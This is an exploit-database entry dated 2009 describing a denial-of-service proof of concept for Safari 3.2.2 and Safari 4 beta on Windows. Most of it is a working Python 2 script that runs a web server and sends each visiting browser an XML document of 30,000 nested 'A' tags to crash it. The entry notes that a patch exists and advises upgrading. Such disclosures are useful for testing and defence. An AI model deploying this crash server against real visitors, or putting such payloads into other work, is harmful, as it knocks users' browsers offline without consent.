Safari 3.2.2/4 (BETA) - Denial of Service (PoC)

vendor:

Safari

by:

Ahmed Obied

7.8

CVSS

HIGH

Denial of Service

CWE

Product Name: Safari

Affected Version From: 3.2.2002

Affected Version To: 4 (BETA)

Patch Exists: YES

Related CWE: N/A

CPE: a:apple:safari

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Safari 3.2.2/4 (BETA) – Denial of Service (PoC)

This PoC code creates a web server and sends a malicious XML file to the client. The malicious XML file contains a large number of 'A' tags which causes the Safari browser to crash.

Mitigation:

Upgrade to the latest version of Safari.

Source

Exploit-DB raw data:

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Tested using:
#     -> Safari 3.2.2 on Windows
#     -> Safari 4 (BETA) on Windows 
#
#   Usage  : python safari.py [port]
#    

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
        
    def get_exploit(self):
        exploit = '<?xml version="1.0"?>'
        exploit += '<A>' * 30000 + '</A>' * 30000
        return exploit
            
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        if self.path == '/':
            print
            print '[-] Incoming connection from %s' % self.client_address[0]
            print '[-] Sending header to %s ...' % self.client_address[0]
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            print '[-] Header sent to %s' % self.client_address[0]
            print '[-] Sending exploit to %s ...' % self.client_address[0]
            self.wfile.write(self.get_exploit())
            print '[-] Exploit sent to %s' % self.client_address[0]

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except KeyboardInterrupt:
                print '[-] Exiting ...' 
        except socket.error:
            print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)    
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()

# milw0rm.com [2009-03-31]